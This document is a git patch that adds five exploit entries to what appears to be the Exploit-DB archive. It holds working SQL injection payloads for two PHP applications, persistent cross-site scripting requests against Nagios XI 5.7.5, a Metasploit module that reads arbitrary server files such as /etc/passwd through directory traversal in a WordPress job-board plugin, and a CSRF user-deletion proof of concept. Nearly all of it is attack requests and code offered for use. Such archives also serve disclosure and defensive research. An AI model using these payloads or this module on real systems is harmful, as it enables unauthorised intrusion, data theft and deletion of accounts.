From aa473257e9c9ce93fbcb34999c352c7108bc91eb Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 22 Jan 2021 05:01:56 +0000 Subject: [PATCH] DB: 2021-01-22 5 changes to exploits/shellcodes Online Documents Sharing Platform 1.0 - 'user' SQL Injection Apartment Visitors Management System 1.0 - 'email' SQL Injection Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit) Anchor CMS 0.12.7 - CSRF (Delete user) --- exploits/multiple/webapps/49451.html | 19 ++++++ exploits/php/webapps/49447.txt | 50 ++++++++++++++++ exploits/php/webapps/49448.txt | 42 +++++++++++++ exploits/php/webapps/49449.txt | 87 +++++++++++++++++++++++++++ exploits/php/webapps/49450.rb | 89 ++++++++++++++++++++++++++++ files_exploits.csv | 5 ++ 6 files changed, 292 insertions(+) create mode 100644 exploits/multiple/webapps/49451.html create mode 100644 exploits/php/webapps/49447.txt create mode 100644 exploits/php/webapps/49448.txt create mode 100644 exploits/php/webapps/49449.txt create mode 100755 exploits/php/webapps/49450.rb diff --git a/exploits/multiple/webapps/49451.html b/exploits/multiple/webapps/49451.html new file mode 100644 index 000000000..f4a072e9c --- /dev/null +++ b/exploits/multiple/webapps/49451.html @@ -0,0 +1,19 @@ +# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user) +# Exploit Author: Ninad Mishra +# Vendor Homepage: https://anchorcms.com/ +# Software Link: https://anchorcms.com/download +# Version: 0.12.7 +# CVE : CVE-2020-23342 + + +###PoC +the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html + +================================ + +================================ +Where (21) is the user id . + +When admin clicks on exploit.html link + +User with id 21 will be deleted \ No newline at end of file diff --git a/exploits/php/webapps/49447.txt b/exploits/php/webapps/49447.txt new file mode 100644 index 000000000..1f82d31fe --- /dev/null +++ b/exploits/php/webapps/49447.txt @@ -0,0 +1,50 @@ +# Exploit Title: Online Documents Sharing Platform 1.0 - 'user' SQL Injection +# Date: 21.01.2021 +# Exploit Author: CANKAT ÇAKMAK +# Vendor Homepage: https://www.sourcecodester.com/php/14653/online-documents-sharing-platform-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/notes.zip +# Version: V1.0 +# Tested on: Windows 10 + +#Description: The 'user' parameterer is vulnerable to error-based and time-based SQL Injection. + +---------------------------------------------------- + +POST /path/login.php HTTP/1.1 +Host: test.com +Content-Length: 29 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://test.com +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://test.com/path/login.php +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + +user=%27&pass=%27&login=login + +---------------------------------------------------- + +#PoC: + +Parameter: user (POST) + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or +GROUP BY clause (FLOOR) + Payload: user=' AND (SELECT 2047 FROM(SELECT +COUNT(*),CONCAT(0x7176706a71,(SELECT +(ELT(2047=2047,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NRPK&pass='&login=login + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: user=' AND (SELECT 2110 FROM (SELECT(SLEEP(5)))pSYW)-- +HnhM&pass='&login=login \ No newline at end of file diff --git a/exploits/php/webapps/49448.txt b/exploits/php/webapps/49448.txt new file mode 100644 index 000000000..ab5f3a3ef --- /dev/null +++ b/exploits/php/webapps/49448.txt @@ -0,0 +1,42 @@ +# Exploit Title: Apartment Visitors Management System 1.0 - 'email' SQL Injection +# Date: 20.01.2021 +# Exploit Author: CANKAT ÇAKMAK +# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/ +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395 +# Version: V1.0 +# Tested on: Windows 10 + +---------------------------------------------------- + +POST /avms/forgot-password.php HTTP/1.1 +Host: test.com +Content-Length: 42 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: test.com +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 +Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://test.com/avms/forgot-password.php +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + + +email=test%40gmail.com&contactno=1&submit= + +---------------------------------------------------- + +poC: + + +Parameter: email (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: email=test@gmail.com' AND (SELECT 2600 FROM +(SELECT(SLEEP(5)))jpeB) AND 'WVFv'='WVFv&contactno=1&submit= \ No newline at end of file diff --git a/exploits/php/webapps/49449.txt b/exploits/php/webapps/49449.txt new file mode 100644 index 000000000..b4c064ad6 --- /dev/null +++ b/exploits/php/webapps/49449.txt @@ -0,0 +1,87 @@ +# Exploit Title: Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting +# Date: 1-20-2021 +# Exploit Author: Matthew Aberegg +# Vendor Homepage: https://www.nagios.com/products/nagios-xi/ +# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ +# Software Link: https://www.nagios.com/downloads/nagios-xi/ +# Version: Nagios XI 5.7.5 +# Tested on: Ubuntu 18.04 + + +# Vulnerability Details +# Description : A persistent cross-site scripting vulnerability exists in the "My Tools" functionality of Nagios XI. +# Vulnerable Parameter : url + + +# POC +# Exploit Details : The following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload. + +POST /nagiosxi/tools/mytools.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 145 +Origin: http://TARGET +Connection: close +Referer: http://TARGET/nagiosxi/tools/mytools.php?edit=1 +Cookie: nagiosxi=5kbmap730ic023ig2q0bpdefas +Upgrade-Insecure-Requests: 1 + +nsp=a2569a2507c7c69600769ca7388614b4264ab9479c560ac62bbc5f9fd76c2524&update=1&id=-1&name=XSS+Test&url=%27+onclick%3D%27alert%281%29&updateButton= + + +############################################################################################################ + +# Vulnerability Details +# Description : A persistent cross-site scripting vulnerability exists in "Business Process Intelligence" functionality of Nagios XI. +# Vulnerable Parameter : groupID + + +# POC +# Exploit Details : The following request will create a BPI group with an XSS payload. Click on the Group ID for the malicious BPI group to trigger the payload. + +POST /nagiosxi/includes/components/nagiosbpi/index.php?cmd=add HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 186 +Origin: http://TARGET +Connection: close +Referer: http://TARGET/nagiosxi/includes/components/nagiosbpi/index.php?cmd=add&tab=add +Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td +Upgrade-Insecure-Requests: 1 + +groupID=%27onclick%3Dalert%281%29%2F%2F&groupType=default&groupTitle=TEST&groupDesc=&groupInfoUrl=&groupPrimary=1&groupWarn=90&groupCrit=80&groupDisplay=2&addSubmitted=true + + +############################################################################################################ + +# Vulnerability Details +# Description : A persistent cross-site scripting vulnerability exists in "Views" functionality of Nagios XI. +# Vulnerable Parameter : url + + +# POC +# Exploit Details : The following request will create a view with an XSS payload. Click on the malicious view to trigger the payload. + +POST /nagiosxi/ajaxhelper.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 147 +Origin: http://TARGET +Connection: close +Referer: http://TARGET/nagiosxi/account/ +Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td + +cmd=addview&url=javascript:alert(1)&title=TESTVIEW&submitButton=&nsp=c97136052a4b8d7d535c7d4a7a32389a5882c65cb34f2c36b849f72af52b2056 \ No newline at end of file diff --git a/exploits/php/webapps/49450.rb b/exploits/php/webapps/49450.rb new file mode 100755 index 000000000..2ee36db20 --- /dev/null +++ b/exploits/php/webapps/49450.rb @@ -0,0 +1,89 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HTTP::Wordpress + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Simple JobBoard Authenticated File Read Vulnerability', + 'Description' => %q{ + This module exploits an authenticated directory traversal vulnerability in WordPress plugin 'Simple JobBoard ' < 2.9.3, + allowing arbitrary file read with the web server privileges. + }, + 'Author' => + [ + 'Arcangelo Saracino', # Vulnerability discovery + 'Hoa Nguyen - Suncsr Team', # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2020-35749'], + ['WPVDB', 'eed3bd69-2faf-4bc9-915c-c36211ef9e2d'], + ['URL','https://arkango.github.io/CVE-2020/CVE-2020-35749%20DIr.%20Traversal%20Simple%20Board%20Job%20Wordpress%20plugin.html'] + ], + 'DisclosureDate' => 'Jan 15 2021')) + + register_options([ + OptString.new('FILEPATH',[true,'The path to the file to read','/etc/passwd']), + OptString.new('USERNAME',[true,'The WordPress username to authenticate with']), + OptString.new('PASSWORD',[true,'The Wordpress password to authenticate with']), + OptInt.new('DEPTH',[true,'Traversal Depth (to reach the root folder',8]), + ]) + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def check + cookie = wordpress_login(username,password) + if cookie.nil? + store_valid_credential(user: username, private: password, proof: cookie) + return CheckCode::Safe + end + CheckCode::Appears + end + + def run_host(ip) + cookie = wordpress_login(username, password) + traversal = '../' * datastore['DEPTH'] + filename = datastore['FILEPATH'] + filename = filename[1, filename.length] if filename =~ /^\// + + res = send_request_cgi({ + 'cookie' => cookie, + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,'wp-admin',''), + 'vars_get' => + { + 'post' => 'application_id', + 'action' => 'edit', + 'sjb_file' => "#{traversal}#{filename}" + } + }) + + fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200 + fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? + print_good('Downloading file ...') + print_line("\n#{res.body}\n") + fname = datastore['FILEPATH'] + path = store_loot( + 'Simple_JobBoard.traversal', + 'text/plain', + ip, + res.body, + fname + ) + print_good("File save in: #{path}") + end + end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index fd319346d..92458bfc2 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -25890,6 +25890,7 @@ id,file,description,date,author,type,platform,port 49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",2021-01-20,"Rob McCarthy",webapps,multiple, 49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple, 49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",2021-01-20,"Richard Jones",webapps,php, +49447,exploits/php/webapps/49447.txt,"Online Documents Sharing Platform 1.0 - 'user' SQL Injection",2021-01-21,"CANKAT ÇAKMAK",webapps,php, 49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",2021-01-15,"Siva Rajendran",webapps,php, 49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass & RCE POC",2021-01-15,"Himanshu Shukla",webapps,php, 49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)",2021-01-15,AkkuS,webapps,multiple, @@ -43644,3 +43645,7 @@ id,file,description,date,author,type,platform,port 49436,exploits/hardware/webapps/49436.py,"Cisco UCS Manager 2.2(1d) - Remote Command Execution",2021-01-18,liquidsky,webapps,hardware, 49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",2021-01-18,"Karan Keswani",webapps,multiple, 49438,exploits/hardware/webapps/49438.py,"Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)",2021-01-18,"Henrik Pedersen",webapps,hardware, +49448,exploits/php/webapps/49448.txt,"Apartment Visitors Management System 1.0 - 'email' SQL Injection",2021-01-21,"CANKAT ÇAKMAK",webapps,php, +49449,exploits/php/webapps/49449.txt,"Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting",2021-01-21,"Matthew Aberegg",webapps,php, +49450,exploits/php/webapps/49450.rb,"Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)",2021-01-21,"SunCSR Team",webapps,php, +49451,exploits/multiple/webapps/49451.html,"Anchor CMS 0.12.7 - CSRF (Delete user)",2021-01-21,"Ninad Mishra",webapps,multiple,